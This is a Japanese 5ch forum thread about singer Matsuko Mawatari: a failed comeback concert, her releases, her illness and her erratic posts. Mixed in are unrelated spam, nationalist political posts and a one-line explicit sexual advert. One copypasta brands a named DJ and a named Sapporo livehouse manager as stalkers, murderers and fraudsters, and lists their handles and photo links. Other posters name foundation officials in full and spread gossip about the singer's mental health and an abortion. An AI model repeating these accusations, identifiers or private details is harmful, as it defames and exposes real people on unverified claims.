何だか聞いてるこちらも申し訳ない気持ちになってきた('A`) 本来一番盛り上がるはずのラストパート。「めっちゃめちゃー」で音程すら怪しくなってきてるので、聴いてて辛くなる。「いーるんだろうねー」はとうとう裏声で出そうとしたけど失敗、な状態。最後の「ホホエミノバクーダン!」もヨレヨレで終了。 後半続く。 歌い終えた後にお辞儀。あり得ないレベルでちっちゃくなる、土下座してるみたいに錯覚起こしそうになる。 そこから本人MC。 「14年ぶりです。最近はあちこちにお詫び行脚してます」 「引退するつもりだったんですけど高橋ヒロさんの事もあったし、遺志は継がなきゃと思って帰ってきました」 他にも話してたんだが、ほとんど「ごめんなさい」ばっかり。それしか印象に残ってない。 「それでは聴いて下さい。サヨナラBye-bye」さすがに歌えるのかと思った。無茶なんじゃないかと。 案の定最初からまともに歌えない。こっちも逃げ出したくなる。 「サヨナラBye-bye、元気でいてね」の部分が違う意味に聞こえて仕方ない。 しかも原曲通りにリフレインが続く。もはや辛くてしょうがない。それでも歌い続ける馬渡松子さんが痛々しいというか晒し者になってるみたいに見えてくる。コレ何の罰ゲーム? 会場にはドン引きを超えて訳の分からないピリピリした緊張感が漂う。 何とか歌いきった。会場からおざなりじゃなく、かといって熱狂的でもない拍手。 出てきた司会が開口一番、「まあ年月を経て声も変わっちゃうこともありますよね」とフォロー。……アニソン40周年の水木一郎とか70歳を越えたささきいさおがいるところで言われてもねー。 むー、だいぶ抜け落ちてるな。まだ触れないといけないことがあったと思うんだが? でもイメージは伝わったと思う。 俺はステージから離れたところにいたんで(近くには常連さんっぽいのが首タオルで万全の構えを敷いてるから近付けないんだよw)、表情はハッキリ見えなかった。 涙グシャグシャなのは分かった。髪も振り乱したみたいで貞子みたいになってるし。 とりあえずこんくらいで。他に思い出したことがあれば追加するかも。 追記もありがとうです。 いろいろ伝わりました。 心中お察しします(このスレ来る時点でみんな似たような思い持ってると思うので) レポートありがとうございます! 馬渡さんずっと一生大好きだから、無理しなくてもいいと思いました。 確かに2ちゃんの一人の書き込みを鵜呑みにするのは良くない 馬渡さんをかわいそうだと目で最初から見てたら 先入観を持って見ちゃうからな 自分が引いてたから会場全体が引いたと錯覚したのかもしれない 俺は昨日名古屋に見に行ったけど 馬渡さんの声が致命的なほどかすれたりもしてなかったし 会場がドン引きしてるなんてこともなかった 本人のトークもごめんなさいじゃなくて 苦難を乗り越えてここまできました、これからも頑張ります 好きなものを我慢したかわりに、また新たなすきなものができた、 みたいな前向きなものだったように思う >>301 ありがとう! 外タレのクラブイベントなんて口パクばっかりなのに、ブランクあるなかちゃんと歌ってるんだから、凄いと思う。 幽遊白書を描いてた漫画家は今も第一線で活躍してるのに この人に落ちぶれっぷりは凄いな 馬渡さんは今 宮崎でボーカル講師をしてる。 宮崎では結構有名なダンススクールの中でたくさんの生徒を持ってる。 とくに子供たちからは「松子せんせー!」みたいに呼ばれてて、 結構いい先生かも。 一度だけ、馬渡さんと直接メッセ交換した事がある。 旦那さんは社会の先生で、私の地元にも観光で来た事があるとか 色々書いてくれてて嬉しかったなぁ。 図々しいかと思ってその後はそれきりだったけど。 アルバムは全部持ってる。ほんと馬渡さんの歌声好きだ。 中学の頃、友達に色々協力してもらって学校サボってライブ見に行った。 バラブシュカツアー良かったなぁ。 馬渡さん大好き。 馬渡松子がついに本気出してるね blog見たら伝わってきたhttp://open.saloon.jp/ ついに聴けるのか、不安ではあるが期待せずにはいられない 馬渡松子 NEW ALBUM 『KISEKI』2012/5/4発売 MINIPV・インタビュー http://youtu.be/Dcpv8QRoN8A 予約したぜよ PVはなぜそんな難しい曲をセレクトしたんだ… 連休中に聴きたかったけど届きそうにないな 直販じゃないから遅れも仕方ないか むうう 今日アマゾンから届いてた あの悪い意味の衝撃からしたらずいぶんまともになってる気がする もちろん全盛期の歌声を期待して聞いたらがっかりするだろうけど どのくらい持ち直していけるものなのかこのまま見守って行きたいわ 自分も今日手にした Time on Timeが一番もどかしい すごく良い詞と曲なのに メロディが声に無理やり合わせられていると感じた 自由に歌える前提なら凄い歌になったんじゃないか 発売自体は本当に嬉しいのでしばらくじっくり聴き込みます 今回のリリースとリーシャウロン氏のサイトが閉じてしまった事は 何か関係あるのかなぁ。 閉じてないよ なぜか検索に引っかかりにくくしたみたいだ 何か意図があるなら宣伝するのもアレだから直接は張らないけど 画像検索で探した方がたどり着きやすいと思う >>316 ありがとう。久々にサイト見れました! お気に入りに入れといたのに急に繋がらなくなってしまって・・・ リーシャウロン氏のブログはわかったんですが、webサイトのほうが見つかりません。 わかる方教えてください。 リーシャウロン氏のブログで、ウェブサイトに動画をアップしたと書いているのに そのウェブサイトが公開されてないってどういうこと?設定ミス? リーシャウロン氏本人に尋ねたいんだけど、連絡手段がない 動画アップしてくださるのは、すごく嬉しいありがたいことなんだけどね。 公開されてないわけじゃあないよ 前にブログかコメ欄かで一日のアクセスは50くらいが良いみたいなこと言ってたから わざと見つかりにくくしてるんだと思う 検索からたどり着ける方法探してるけど 確かに存在がわかってても全然行けないわ。 前は画像検索ですぐトップページの画像に行けたんだけどな ライブドアから検索したらサイトは出てくるんだけど、 Forbiddenエラーしかでない。 「サイトはあるがアクセスする権限はないです」っていうことらしいのですが、 それが自分だけなのかが気になります。 本当だグーグル・ヤフーでいろんな言葉で検索してばかりで試してなかったけど ライブドア、Bingとかだとちゃんと引っかかるわ そして自分は問題なく見られた ライブ最高でした!! パワフルボイスが健在で嬉しかった 元気貰った、復活本当にありがとうございます ライブ結構人きた? 今のうちにチケット買っとこうかな 最近活動が積極的で嬉しいね 全国回ってるから色々な箇所で観れる 松子さん、マイペースで頑張れ やっとKISEKI聞いた!他の人に出来ない音楽! ライブはなんか行くの怖いな BEST OF MATSUKO MAWATARI 2013.11.20 ON SALE 01.微笑みの爆弾 02.ホームワークが終わらない 03.さよならbyebye 04.デイドリーム・ジェネレーション 05.帰りたい 06.ついてかない 07.PREMONITION 08.GLASSICA 09.P-U 10.ZIP 11.君は今心臓破り 12.男友達 13.基-motoi- 14.らしくもないね 15.こころのままに 16.情けあるよ (Bonus Track) 発売記念東北ライブやるよ 初日は新宿だ 最終日は渋谷だし 詳しくはhpのopensalonで ベストはリマスターということです。 ボーナストラックは新録音とのこと 昔のCDが手に入らないので買うしか 情報ありがとうございます! インストアルバム以外は全てもっていますが 如何せん音が小さいです。 リマスターなら買いですね。 アマゾン情報で12月にはカラオケバージョンも出るみたいですね! Amazon見たらリバースと曲目ほとんど同じだった カラオケはベストに収録すればいいのに 松子さんの意志でないだろうがなんかね ベスト出るのは大感謝だよ いよいよ明日発売なんだけど Amazonはまだ仮がついたままだ・・・orz このまえの渋谷のLiveいったんだけど、関東近郊って少ないのかな 6人ぐらいしかいなかったような・・・・ 他のバンドのファンのほうが圧倒的に多かった >>341 これがどこからのソースなのかわからないけど、予定してたものと内容が変わったね。 >>350->>351 心配なら、ご本人のブログとかで確認を それいいかもしんない (BAND STYLE Ver.)聴いたけど、声だいぶ出てて良かった。 確かに。 KISEKIよりもはるかに良化している様に思う! リマスターも良かったのでこの際全作品再発売になるといいなぁ。 日本政府は、中国が沖縄県・尖閣諸島周辺を含む東シナ海上空に防空識別圏を設定した問題を受け、 カナダのモントリオールで29日(日本時間30日)に開かれた国際民間航空機関(ICAO) 理事会で「安全が脅かされる」として対応策を検討するよう提案した。外務省が30日に発表した。 米国、英国、オーストラリアが賛同したが、当事者の中国は反発した。中国の防空識別圏問題は、 国際機関を舞台にした駆け引きに発展した。 ICAOをめぐり政府は、次回理事会で正式議題に取り上げられるよう関係国への働き掛けを 強める構えだ。東京で12月中旬に開催する日本と東南アジア諸国連合(ASEAN)との特別 首脳会議に向け、フィリピンやベトナムなどASEAN加盟国と防空識別圏問題をめぐる意思 疎通を加速させ、国際社会による「対中国包囲網」形成を急ぐ。 幽助が生き返った時に不良2人から金貸してくれって言われたシーンばりウケた糞ワロタwww 5月25日アニソンバトルMAXで馬渡松子と鈴木結女が共演。これは一大事 なんか、はじまるよ 詳細分かったら、載せるので wktkして待っててね というか、もっともりあげようぜ 関東勢ちょっともりあがらなすぎ 幽白久しぶりに見たけどさよならbyebyeいいね 歌上手いし曲もいい! 昔のブログ見たけど相当病んでたんだな よくここまで復活できたよ アニソンアカデミー(NHK-FM)でライブ聞いたけど大分歌声劣化しちゃったと思ったら 病気してたのか…心気症?パニック障害? ドリカムはこの人の若い時の才能を大分吸収してるような気がする ☆ 日本の核武装は早急に必須です。☆ 総務省の、『憲法改正国民投票法』、でググってみてください。 日本国民の皆様方、2016年7月の『第24回 参議院選挙』で、日本人の悲願である 改憲の成就が決まります。皆様方、必ず投票に自ら足を運んでください。お願い致します。 さよならbye-bye、今更itunesでポチった♪───O(≧∇≦)O────♪ ブログに書いてある診断名見る限り、関東移住はちょっと心配しちゃう。 プライベート含め、きちんとしたサポートを受けられる環境を確保出来ていればいいのだけど。 邦楽もおもしろいけど、小遣い稼ぎの方法とか グーグル検索⇒『増田のセンジョイウツツノ』 7FW7YIPQOS 自分の置かれている立場を有り難てェことだと思わんとダメですよ。 文句を言ったり不満ばかり言っている奴は、人生終わるまで不満を抱き続ける人間になるぞ。 いつも誰かのせいにしていれば、努力をしなくてもいいから楽だ 社会が悪い、政治が悪いなんて言って、一体何があるんだ。 人に貢献できるようになってから言うべきなんだよ。 筋肉ふたなり娘にバトルファックを挑む桃色髪の女の子であったが、開始早々極太ペニスで秘唇を貫かれてしまい、ピンチに陥るのであった。 幽白25周年をネットで知りこのお方をふと調べFBみたらまぁ…少しショックだ 松居一代といい統失ってなぜなるんだろうな ここまできたら基地としか言い様ねえな どこまで正気なのかわかんね 残念な人だわ すごくおもしろい嘘みたいに金の生る木を作れる方法 興味がある人はどうぞ 検索してみよう『ネットで稼ぐ方法 モニアレフヌノ』 XBI 誰でもできる稼ぐことができるホームページ 念のためにのせておきます 2chまとめで副業できる方法とは?さりげなく検索しちゃおう『立木のボボトイテテレ』 U6P >>391 何かキッカケがあったんだろうけどね 病から立ち直って講師や講演をやってると紹介されてるけど、FB見る限り継続してるんじゃないかなと思っちゃう >>382 Wikipediaに「神経症」とあるから間違いないだろうね ブログは無くなったし TwitterやYouTubeは1月から更新されない 治療に専念してるなら良いけど心配 いったん寛解はしたけどブリ返した感じなのかね なんか知らんが気の毒である 現役時代のあの声は今後復活する見込みある? 声質が似てる、またはほぼ同じ歌手がいたら教えてほしい 声で惚れた歌手は後にも先にも現役時代のこの人の声だけだわ あの声を聞いただけで無条件に瞬時にどことなく懐かしさとか古き良き時代が頭に蘇ってくる FB初めて読んだけどヤバいね…しっかり治療してくれるといいんだけど 中絶がきっかけなのかね? >>412 本人の直筆? それとフェイスブックの内容が滅茶苦茶というか名誉毀損スレスレ? (告発かリークそれかナイショの生存確認報告のつもりなのかな、と思ったけど悪手過ぎる…;) (プライバシーの侵害の片棒担いじゃってる……) (一番良いのは、コピペせずその市役所?に個人情報のお漏らしの可能性を指摘&削除を促すだけで良いんだけど……) 【全スレ連絡 注意喚起 】 【拡.散.希.望 】 コピーリンク転載自由 ◆ ◆ 東京の無名DJ ume-rock(ウメロック) は危険 ◆ ◆ 練馬区、吉祥寺周辺をうろつくume-rock(ウメロック)は集団ストーカー 工作員 大量デマ中傷投稿でアーティスト、スタッフ、一般客を自殺に追い込むネット工作 次々に人を自殺泣き寝入りに追い込む殺人鬼 ゴミ漁りして個人情報収集やストーキングもやってる 女性に卑猥なスカトロ投稿嫌がらせをやる変質者 ご尊顔 https://m.imgur.com/a/zI7k2Vx https://imgur.com/a/F99kLvs https://imgur.com/a/PqVobul https://imgur.com/a/VxbHog0 https://m.imgur.com/a/mtOdqaw https://m.imgur.com/a/0kcA5wo https://m.imgur.com/a/svw522P @ume_rock http://mobile.twitter.com/ume_rock 詳細は専用スレで↓ ウメロックの悪事を一挙大暴露! http://medaka.5ch.net/test/read.cgi/4649/1591070603/l50 「 ume-rock 集団ストーカー 」で検索 ◆ ◆ 札幌のライブハウス Sound Lab mole は危険 ◆ ◆ 店長 の大嶋(おおしま)は集団ストーカー ネット工作員 客叩き、アーティスト、バンド潰し、自殺に追い込むネット工作 次々に人を自殺に追い込む殺人鬼 店長 の大嶋 ( おおしま)は詐欺師 配信ライブで卑怯にお金を巻き上げる ※ソースあり http://otototabi.com/2020/shared/img/interview/manabu_02_06.jpg @ohshima0040 http://mobile.twitter.com/ohshima0040 @soundlabmole http://mobile.twitter.com/soundlabmole 詳細は↓ 専用スレで 大嶋智洋の悪事を一挙大暴露! http://medaka.5ch.net/test/read.cgi/4649/1590645255/l50 gcos 「 Sound Lab mole 集団ストーカー 」で検索 https://twitter.com/5chan_nel (5ch newer account) 最近ご本人(の財団法人?)がwikipediaにモリモリ追記してるみたい 7月のブラジルでのイベントで「最後の歌唱」をするって書いてあってびっくり …しかし腫れ物扱いされてるのか、全く話題にあがらんね 作詞家先生もさじなげちゃってる様子でなんともはや 随分と仲が険悪そうだねぇ・・・ アニメファンとしては悲しや おや、ちょっと盛り上がってる スクショつきtweetきちゃったもんなー ちなみにとあるレーベルの代表がギャラ未払いと法人の人事トラブルをツイで告発してますね なんというか、いろいろ残念ですな >>422 いままでは一方的な空中戦の様相でしたが、ブラジルで歌われさらに宣伝につかわれたのがよっぽど腹に据えかねたんですかね。。 実写化で良くも悪くも盛り上がってる矢先に過去全否定 いよいよ終わりかな 残念です 高橋さんdisのツイート見逃したなあーー 事実だとしたら許し難い アニソンとして採用されたから世間に知られたのに、アニメ業界を否定するようなツイートをしていて呆れた。 アニメが嫌だったみたいな思いは時代もあるからまぁ1000歩譲って理解出来んでもない悲しいけどね 作詞家とバチバチやり合うのもまぁまだいい(見たくはなかったが) でもひろさんdisはどうなんだい・・・病気考慮しても駄目だろう そしてそんな大嫌いな日本アニメにまたすがって宣伝活動っていう(アリアナis誰?) あの病気って自分の周り焼け野原にしないと気がすまないものなのかね それかワンチャン炎上狙ってるのか知らんけど そんなに日本がきらいならはやくブラジルに移住して、どうぞ トークセッションとやらは長すぎて見る気しないので、代わりにブラジルでのリハ風景だという動画見てきたけど。。 ブラジルのオタクの皆さん懐深すぎでしょ、わざわざ招致してこの歌唱されたらふつう許さないわこれ 音作りと歌唱力に限れば、スティービーワンダーとかフィルコリンズのような、全部自分ひとりでこなせる才能があったのかもしれない でも我が強すぎて、時代やニーズ、版元作詞家プロデューサー、そして自身の衰えに歩調を合わせようとしてこなかったゆえの現在なのかな それと、自分で作った居場所を自らぶち壊していく負のバイタリティが謎すぎる すべてが病気のせいってわけでもなさそうなのがなあ、全盛期を知る者的には悲しい なんかたまたま見かけてから面白くなっちゃってしばらくヲチしてたんだけど、勉強になったこともあったし(ビルボードの記事風広告15万円とかw)いい反面教師とさせてもらいました、アリガトゴザイマス 免罪符代わりの世界平和連呼はこのご時世いろいろヤバい インタビュアーさんも大変だなーまじで乙です あのツイートしては消し、しては消しのやつは凄いですね! 「WHOがスキンとドラッグの集団であることがわかった次第」とか、ぶっ飛び過ぎてる WHO批判いつも味わい深いですね。 いつも顔写真添えてるけど大丈夫かアレ。 整合性のある文章が書けない病気なんだから、入賞だの入選だの重箱の隅つついたってしょうがないのに。 そもそも提携してる美術館が立派なだけで、中身はカルチャースクールレベルのなんの権威もない展覧会ですよ。 そんな些細なことにいちいち目クジラたてつつ、未だに「ワシが育てた」アピールがすごい未練おじさんと、離脱したとかいいながら朝ドラへの文句をやめる気配がない告発おじさん、歌手本人に負けず劣らず香ばしくてすこ はわわ〜昨日に引き続き激しい〜 台風で気圧乱高下だからね、お大事にやで お金は返します がちょっと弱気で焼酎吹いた 「(株)サスティナ」と「えのもと」に何か怨みでもあるのか?名指しの攻撃 サスティナは宮崎の会社、アニソンイベントの共催者?スポンサー? えのもと氏とかしわで氏は宮崎で活躍中のラジオパーソナリティだと思われる えのもと氏は財団の動画に出てる人と同一人物なのか?理事なのかは不明 今回の中島氏と松谷氏は一体誰なんだろうか! 「中島は馬○」「松谷も○鹿」などといったツイートを昼に見かけたのですが、一瞬で消しとった! まじで誰なんだ!! 「松谷」は松谷直樹 一般財団法人 Keep right の評議員 「中島」は中島啓吾 同財団法人の監事 「えのもと」は榎本浩一 同財団法人の理事 ではないでしょうか? これは誰でも閲覧できる法人情報に記載されてます。 >>441 有料らしいけどわざわざお金を払って閲覧したの? スクラ まイヒン だルブ ? 08/31 14時08壺 >>441 すごい!ありがとうございます。 しかし何者なのか、なんでmさんに関わってるのかはよくわからないですね。 音楽セラピーの動画楽しみ〜 ところで月1更新だったはずのコネクトなんたらはもうやめちゃったのかな? ビジネス講座の続きは? 暗号放送に早く移行しろよ 09/02 15時38壺 間もなくの定義とは? そしてなぜ限定公開??? 怖すぎて見られないお 間もなくじゃなくてもうすぐ配信だった、めんごめんご 今日壺の人来ないな 限定公開になってたのやっと気づいたみたい、鍵はずれてた! あとFacebookで海外ファンのゆうはく動画にケチつけてたよ! 百歩譲って曲の権利を主張するのはわかる(わかるとはいってない)(皆のものですって貴女がいうてたやんけ) が、ゆうはくのロゴ使用に我が物の体で文句言ってるのは流石に面白すぎる 家賃滞納4ヶ月 あの投稿(現在は削除済)が真実なら、大家さん相当困ってるだろうな つべのチャンネル名がいつの間にか法人じゃなくなって本人のものになってる 法人運営諦めたのかな? 家賃払えないくらいじゃしかたないか 感性にビットコインはいらない やべー令和イチの名言きたわね 被災地の皆サーン頑張ってますか(絵文字)って。。 3.11の支援曲らしいけど、ツイートでの説明がないから、突然呼びかけられても( ゚д゚)ってなるだけだし しかも被災地は近頃毎年のペースで増えている 嬉しいのかなんなのか知らんけどあのテンションでのつぶやき、東北の方はもちろん、直近の被災地である清水の方が見たらどう思うかね なんか地味に増えてるフォロワの反応次第でちょっと燃えてもおかしくない案件じゃないの >>441 ネットへの実名(個人情報)晒しは罪になる?対処法を徹底解剖 2022年10月19日 インターネット上にあるSNS・掲示板・ホームページのほとんどでは「利用規約」において個人情報を晒す行為を禁止しています。 実名や電話番号・住所といった情報は「個人情報」にあたるので、通常はサイトの運営者や管理人に削除依頼を申請すれば対応してもらえることもあります。 川柳じゃなくて短歌なんですがそれは 今回は飽きずに何回続くかな? ところでライブ行った人いるのかなー?感想とか様子とかあがってないから気になる 難解な 神の啓示を 書き記し 明けに消し去る ノストラダムス このスレは消されたツィートを貼っていくスレにしたら盛り上がるんじゃないの? 録音に関わった演奏者の方への攻撃が始まったようですね。 そもそもこんな全く売れていないアルバムの何をドリカムが買うのでしょう? > アルバム「Love Legal/如月-kisa-」の担当をしたバンドマンが、ドリカムに譜面とトラックを売ったようです。 パクリの勉強会でしょう。 >>461 譜面は自分で書いて(バンドマンに)渡したものということじゃない? それを「売った」と言ってるのだと思う 昨晩だけで何人攻撃したのだろう。ドリカム中村さん、慶應の相馬淳美さん、持ち上げるように見せて「ホモ」とか言われた西川さん(名前の漢字も間違えてるし)特に中村さんのことは相当恨んでるとしか思えない。怖い。 「アメリカに原爆を落とせ!!!」(原文ママ) これを世界に向けて発信する50代後半の財団法人代表理事って。。。 今夜のXポスト > Destroy Tokyo, which is creating artificial brain AI! For the world. 「東京を破壊しよう!」と呼びかけてますね。 ご自身が代表となっている法人はそういう組織なのかしら? 昨夜のポストはツイ消ししてないので本心なんですね。 「ホモ」とか表現が下品なんだよ。全てにおいて。 >>471 定期的にそんなことをツィート(ポスト)してる気がしますね 「吐いた唾飲み込めねぇぞ!」と誰か本人に言ってあげて! 珍しくめちゃリポストされてるじゃないですか!実写化成功なのか?(そうか??) これをきっかけに近年の振る舞いが世間に周知されることになるのか… そして相変わらずふんわりしたエアリプだけの未練おぢ、もっとがんばってほすい 「殺人でした」って何事? 本当に文章を書く能力が無い婆さんだな。 このYouTube ところどころしか見れてないんだけど、凄い内容だ。 馬渡松子のデビュー時の所属事務所ってどこでしたっけ? https://youtu.be/Iy-ILMWs_lw?si=RN0HhPTa3nhqXx2A えーちょっとちょっと今回のご乱心はいくらなんでもやばいんよ〜!! 作詞家氏最近つぶやいてないし心配 >>485 自己レス 作詞家氏闘病中らしい なおさらうーーーーーん… リーシャウロン氏の病状等の情報が入ったのでしょう 相手が何も反論できない状況であると知って20歳の頃の妊娠・中絶の暴露 しかもリーシャウロン氏を蔑める内容 私が当事者だったら絶対に許せないだろう 見事に消されているけど、 作詞家さんとなにかあったとかそういうツイートだったの? >>488 上にあるように二十歳の頃の妊娠、中絶の話ですよ 二十歳の頃のって、何十年前? しかもその後、しれっと結婚離婚しておいて今更? わざわざ掘り返さないと気が済まなかったのかな 彼女と同性だけど、妊娠はともかく、中絶は自分の意思だと思う なんか残念な人になられてしまってますね >>490 リーシャウロン氏が何度もツイートしてた内容を読み解いて行くと、かなりタチの悪い人ですね。 実態の無い財団法人も怪しさ満点で(笑) 一瞬だけどCoccoの悪口も書いてたよね… 1月中旬ぐらいに… 何処かで、Coccoはレコード会社の後輩って聞いた事がある。 Coccoも最初は売れないと思われていて それでも今まだCDを初回限定盤とか出してもらえている 長生きなアーティストになった Cocco本人の努力だと思う それが悔しくて悪口言うのって格好悪い キサさんを頑張れとしか思わない 目を開けてってところ、FmだけどF7sus4でもいける あとこの単音カッティング面白いな できないけど >>1 笑ってはいけないもそうやけどガキ使の本編も ダウタウの松ちゃん浜ちゃんも60歳の還暦を過ぎたから 松ちゃんの性加害問題関係なしに視聴率も低いし 元々遠からず終了の予定やったやろ あと同じ日テレ系列の読売制作のDXデラックスも シンプルに視聴率が低いから元々遠からず終了の予定だった ガキ使とDXと笑ってはいけないの枠の後継番組は全部 千鳥がMCの番組にすればいいと思う あとフジのジャンクSPORTSは MCを千鳥ノブにすればいいと思う ノブは前からスポーツ番組のMCをやりたいと 言うてたし >>1 幽霊の正体見たり枯れ尾花 枯れススキ ダウタウ ダウタウ松本 ダウタウ浜田 >>1 テレ東視聴率最下位脱出 やっぱりチャンネル番号変更の影響が じりじりとボディブローのように積み重ねって ここに結実した感があるよな 個人的にはNHKを含む在京キー局のチャンネル番号は シンプルに開局日順に 地上波 1ch NHK総合 2ch NHKEテレ 3ch 日本テレビ 4ch TBSテレビ 5ch テレビ朝日 6ch フジテレビ 7ch テレビ東京 8ch 東京MXテレビ 9ch テレビ神奈川/テレビ埼玉/千葉テレビ BS波(BS2K/BS4K/BS8K共通) 1ch BSNHKメインch 2ch BSNHKサブch 3ch BS日テレ 4ch BSTBS 5ch BS朝日 6ch BSフジ 7ch BSテレ東 こうするべきというか 本来これしかないと思うこれ一択 今からでも遅くないからこう再変更すべき read.cgi ver 07.5.4 2024/05/19 Walang Kapalit ★ | Donguri System Team 5ちゃんねる